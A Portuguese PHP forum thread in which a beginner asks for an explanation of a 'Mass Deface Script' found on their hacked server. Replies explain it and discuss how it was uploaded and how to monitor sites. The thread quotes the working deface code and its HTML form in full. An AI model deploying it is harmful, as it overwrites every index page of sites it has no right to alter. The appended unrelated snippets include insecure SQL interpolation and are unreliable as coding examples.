Ir para conteúdo

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

cesar rocha

entender o que este arquivo estava executando

Recommended Posts

Ola sou iniciante na area e encontrei este arquivo dentro de meu servidor :

 

<?php

/*

Script: Mass Deface Script

*/

echo "<center><textarea rows='10' cols='100'>";

$defaceurl = $_POST['massdefaceurl'];

$dir = $_POST['massdefacedir'];

echo $dir."\n";

 

if (is_dir($dir)) {

if ($dh = opendir($dir)) {

while (($file = readdir($dh)) !== false) {

if(filetype($dir.$file)=="dir"){

$newfile=$dir.$file."/index.html";

echo $newfile."\n";

if (!copy($defaceurl, $newfile)) {

echo "failed to copy $file...\n";

}

}

}

closedir($dh);

}

}

echo "</textarea></center>";

?>

 

 

<td align=right>Mass Defacement:</td><br>

</div>

<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>

<div class="style31">

[+] Main Directory: <input type='text' style='width: 250px' value='<?php echo getcwd() . "/"; ?>' name='massdefacedir'>

[+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>

<input type='submit' name='execmassdeface' value='Execute'></div>

</form></td>

 

 

 

Podem me ajudar a entender o que este arquivo estava execultando ?

Compartilhar este post


Link para o post
Compartilhar em outros sites

O script pega uma URL (massdefaceurl) e a define em todos os arquivos do seu servidor. Ou seja, todos os arquivos serão iguais (um arquivo malicioso definido em massdefaceurl)

 

Tópico movido
Entretenimento -> PHP

Compartilhar este post


Link para o post
Compartilhar em outros sites

Comecei a procurar depois de dois sites terem as index reescritas.

estou revendo minha segurança, penso que este arquivo foi upado por algum formularios que permitiu upload de .php.

 

O que acha ?

 

Agora fiquei preocupado , tenho 9 sites neste servidor e estou monitorando eles.

Sabe me dizer como faço para criar um algoritimo que possibilita minhas index me apresentarem como online em uma pagina onde posso ficar monitorando. Como se eu tivesse um sistema que me informasse que meus sites estão ok.

 

Quero colocar algo que fique se comunicando comigo , então se tiver algum problemas com um site vou saber .

Compartilhar este post


Link para o post
Compartilhar em outros sites

O arquivo pode ter sido enviado em algum form de upload ou pode haver alguma outra vulnerabilidade que permitiu a execução de alguma rotina que baixasse o script.

 

Existem vários serviços de monitoramento. Uptime Robot é um deles (eu utilizo). Eles vão verificar ping, http etc. Ou seja, por mais que o site seja hackeado, ele vai responder ping e retornar status 200. Dessa forma, esses serviços de simples monitoramento não resolverão seu problema.

Você pode criar um rotina que faz acessos frequentes ao sites e verifica o conteúdo deles. Desde que cada site tenha algo no código-fonte que o identifique, será simples fazer isso.

Compartilhar este post


Link para o post
Compartilhar em outros sites

  • Conteúdo Similar

    • Por ILR master
      Fala galera, tudo bem?
       
      Tenho o seguinte codigo:
       
       class Data {
      public static function ExibirTempoDecorrido($date)
      {
          if(empty($date))
          {
              return "Informe a data";
          }
          $periodos = array("segundo", "minuto", "hora", "dia", "semana", "mês", "ano", "década");
          $duracao = array("60","60","24","7","4.35","12","10");
          $agora = time();
          $unix_data = strtotime($date);
          // check validity of date
          if(empty($unix_data))
          {  
              return "Bad date";
          }
          // is it future date or past date
          if($agora > $unix_data) 
          {  
              $diferenca     = $agora - $unix_data;
              $tempo         = "atrás";
          } 
          else 
          {
              $diferenca     = $unix_data - $agora;
              $tempo         = "agora";
          }
          for($j = 0; $diferenca >= $duracao[$j] && $j < count($duracao)-1; $j++) 
          {
              $diferenca /= $duracao[$j];
          }
          $diferenca = round($diferenca);
          if($diferenca != 1) 
          {
              $periodos[$j].= "s";
          }
          return "$diferenca $periodos[$j] {$tempo}";
      }
      }
       
      Funciona redondinho se o valor retornado for de algumas horas, mas...
      Quando passa de dois meses, ele retorna a palavra mess. Deve ser por conta dessa linha
      if($diferenca != 1) 
          {
              $periodos[$j].= "s";
          }
       
      Quero que modre:
       
      2 meses atrás
      e não
      2 mess atrás.
       
      Espero que tenham entendido.
       
      Valeu
    • Por Carlos Web Soluções Web
      Olá...
      Estou tentando fazer o seguinte !!
      Listando dados em tabela !!
      Gostaria que....se na listagem houver 4 linhas...indepedente de seu número de ID, faça a listagem em ID ser em ordem 1 2 3 4 !!
      Exemplo...se tiver uma listagem de dados que está em ID 1 3 3...faça ficar 1 2 3 !!

       
      echo "<table class='tabela_dados' border='1'> <tr> <td>ID</td> <td>Nome Empresa</td> <td>Responsável</td> <td>Telefone 1</td> <td>Telefone 2</td> <td>E-mail 1</td> <td>E-mail 2</td> <td>Endereço</td> <td>CEP</td> <td>Bairro</td> <td>AÇÃO 1</td> <td>AÇÃO 2</td> </tr> "; $sql = "SELECT ID FROM usuarios_dados WHERE Usuario='$usuario'"; $result = $conn->query($sql); $num_rows = $result->num_rows; $Novo_ID = 1; for ($i = 0; $i < $num_rows; $i++) { $registro = $result -> fetch_row(); $sql2 = "UPDATE usuarios_dados SET ID='$Novo_ID' WHERE ID='$Novo_ID'"; $result2 = $conn->query($sql2); $Novo_ID++; } $sql = "SELECT * FROM usuarios_dados"; $result = $conn->query($sql); if ($result->num_rows > 0) { // output data of each row while($row = $result->fetch_assoc()) { echo "<tr> <td>$row[ID]</td> <td>$row[Nome_Empresa]</td> <td>$row[Responsavel]</td> <td>$row[Telefone_1]</td> <td>$row[Telefone_2]</td> <td>$row[Email_1]</td> <td>$row[Email_2]</td> <td>$row[Endereço]</td> <td>$row[CEP]</td> <td>$row[Bairro]</td> <td> <form method='post' action='Editar_Dados.php'> <input type='hidden' name='usuario' value='$usuario'> <input type='hidden' name='senha' value='$senha'> <input type='hidden' name='ID' value='$row[ID]'> <input type='submit' style='padding: 10px;' value='EDITAR'> </form> </td> <td> <form method='post' action='Deletar_Dados.php'> <input type='hidden' name='usuario' value='$usuario'> <input type='hidden' name='senha' value='$senha'> <input type='hidden' name='ID' value='$row[ID]'> <input type='submit' style='padding: 10px;' value='DELETAR'> </form> </td> </tr> "; } } else { echo "0 results"; } $conn->close();  
    • Por ILR master
      Boa tarde pessoal, tudo bem ?
       
      Eu uso o tinymce para cadastro de textos no meu siite, porém, quero fazer um sistema para que os colunistas possam fazer o próprio post.
      O problema do tinymce, é que ele mantém a formatação do texto copiado, como tamanho de fonts, negritos, etc... Quero que o usuário cole o texto e a própria textarea limpe a formatação para que ele formate como quiser.
       
      A pergunta é:
       
      O tinymce tem uma opção para desabilitar a formatação quando um texto é colocado?
      Tem alguma função via java ou php para retirar a formatação assim que o texto é colado?
      Ou é melhor usar um outro editor?
       
      Agradeço deste já.
    • Por Giovanird
      Olá a todos!
      Tenho uma pagina que possui uma DIV onde coloquei uma pagina PHP.
      Uso a função setInterval para atualizar a pagina inclusa dentro da DIV.
      O problema é que ao acessar o site , a DIV só me mostra a pagina inclusa somente quando completo o primeiro minuto.
      Preciso que a pagina inclusa já inicie carregada
       
      Meu código JavaScript e a DIV com a pagina PHP
       
      <script> function atualiza(){ var url = 'direita.php'; $.get(url, function(dataReturn) { $('#direita').html(dataReturn); }); } setInterval("atualiza()",60000); </script> <div> <span id="direita"></span> </div>  
    • Por ILR master
      Fala pessoal.
       
      Seguinte:
       
      Quero selecionar duas tabelas e mostrar com resultados intercalados. Abaixo segue um código explicando para vcs terem uma ideia.
       
      $consulta = "SELECT A.*, B.* FROM tabela1 A, tabela2 B'";
      $resultado = mysqli_query($conexao, $consulta) or die ("erro");
      while($busca = mysqli_fetch_array($resultado)){
       
      print $busca['cod_evento']; --> traz o código da tabela1 
      print $busca['titulo_evento']; -->  traz o titulo da tabela1
      print $busca['cod_noticia']; --> traz o código da tabela2
      print $busca['titulo_noticia']; --> traz o tituloda tabela2
       
      }
       
      Espero que entendam. Grato
       
×

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.